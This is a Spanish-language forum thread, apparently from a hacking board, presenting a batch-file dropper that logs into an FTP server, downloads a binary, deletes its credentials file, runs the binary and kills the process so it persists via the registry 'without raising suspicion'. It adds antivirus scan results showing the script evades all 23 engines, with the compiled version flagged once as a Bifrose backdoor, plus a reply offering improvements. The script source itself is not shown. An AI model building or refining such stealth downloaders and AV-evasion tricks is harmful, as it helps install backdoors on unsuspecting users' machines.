Este script descarga y ejecuta un archivo desde FTP
Explicacion:
1 Genera el archivo datos.txt donde guarda las credenciales de acceso para iniciar sesion en el ftp
2 Por defecto lo descarga en el escritorio
3 Borra el archivo datos.txt
4 Ejecuta el binario
5 Espera dos segundos y mata el proceso (importante si tu servidor tiene protegido el proceso con BSOD o algo del estilo quita esta linea, yo la pongo para no levantar demasiadas sospechas, espera 2 segundos para que se agregue al registro y ya se iniciara normal cuando el PC se reinicie)

El script se puede compilar para que no se muestre la ventana

Scan de downloader.bat

[Enlace externo eliminado para invitados] free virus scanner results

Information
  • Object : downloader.bat (420 bytes)
  • Results : fully clean
  • Started : 14/02/16
  • Link : [Enlace externo eliminado para invitados]
Results
  1. Arcavir Antivirus 2014 : Clean
  2. avast! Internet Security : Clean
  3. AVG Anti-Virus : Clean
  4. Avira Antivirus Suite : Clean
  5. Bitdefender Antivirus Plus : Clean
  6. Clam AntiVirus : Clean
  7. COMODO Internet Security : Clean
  8. Dr.Web Anti-virus : Clean
  9. eScan Antivirus : Clean
  10. ESET NOD32 Antivirus : Clean
  11. F-PROT Antivirus for Windows : Clean
  12. F-Secure Internet Security 2014 : Clean
  13. FortiClient Lite : Clean
  14. IKARUS anti.virus : Clean
  15. Jiangmin Antivirus 2011 : Clean
  16. K7 UltimateSecurity : Clean
  17. Kaspersky Anti-Virus : Clean
  18. McAfee VirusScan Enterprise : Clean
  19. Quick Heal Internet Security : Clean
  20. Sophos Anti-Virus : Clean
  21. Symantec Endpoint Protection : Clean
  22. Total Defence Anti-Virus 2011 : Clean
  23. Zillya! Internet Security : Clean

Scan de downlaoder.exe (compilado)
[Enlace externo eliminado para invitados] free virus scanner results

Information
  • Object : downlaoder.exe (92.5 KB)
  • Results : 1/23
  • Started : 14/02/16
  • Link : [Enlace externo eliminado para invitados]
Results
  1. Arcavir Antivirus 2014 : Clean
  2. avast! Internet Security : Clean
  3. AVG Anti-Virus : Clean
  4. Avira Antivirus Suite : Clean
  5. Bitdefender Antivirus Plus : Clean
  6. Clam AntiVirus : Clean
  7. COMODO Internet Security : Clean
  8. Dr.Web Anti-virus : Clean
  9. eScan Antivirus : Clean
  10. ESET NOD32 Antivirus : Clean
  11. F-PROT Antivirus for Windows : Clean
  12. F-Secure Internet Security 2014 : Clean
  13. FortiClient Lite : Clean
  14. IKARUS anti.virus : Backdoor.Win32.Bifrose
  15. Jiangmin Antivirus 2011 : Clean
  16. K7 UltimateSecurity : Clean
  17. Kaspersky Anti-Virus : Clean
  18. McAfee VirusScan Enterprise : Clean
  19. Quick Heal Internet Security : Clean
  20. Sophos Anti-Virus : Clean
  21. Symantec Endpoint Protection : Clean
  22. Total Defence Anti-Virus 2011 : Clean
  23. Zillya! Internet Security : Clean

Mostrar/Ocultar

666699966999999996699966699999
666699966999999996699966969999
699999966999999996699966996999
666699966999999996699966999699
666699966999999996699966999699
699999996699999966999966996999
699999999669999669999966969999
699999999996666999999966699999
https://reversecodes.wordpress.com

http://indeseables.github.io/
Si no me equivoco el comando Sleep sólo está disponible en WinVista y superiores. También el parámetro del comando start debería estar entre comillas por si el nombre de usuario contiene un espacio.
Gracias Blau por las correciones, lo dejo un poco mas optimizado para que no muestre todo el proceso de conexion del ftp tanto tiempo y con una alternativa al sleep.

Mostrar/Ocultar

666699966999999996699966699999
666699966999999996699966969999
699999966999999996699966996999
666699966999999996699966999699
666699966999999996699966999699
699999996699999966999966996999
699999999669999669999966969999
699999999996666999999966699999
https://reversecodes.wordpress.com

http://indeseables.github.io/
Responder

Volver a “Otros lenguajes de Scripting”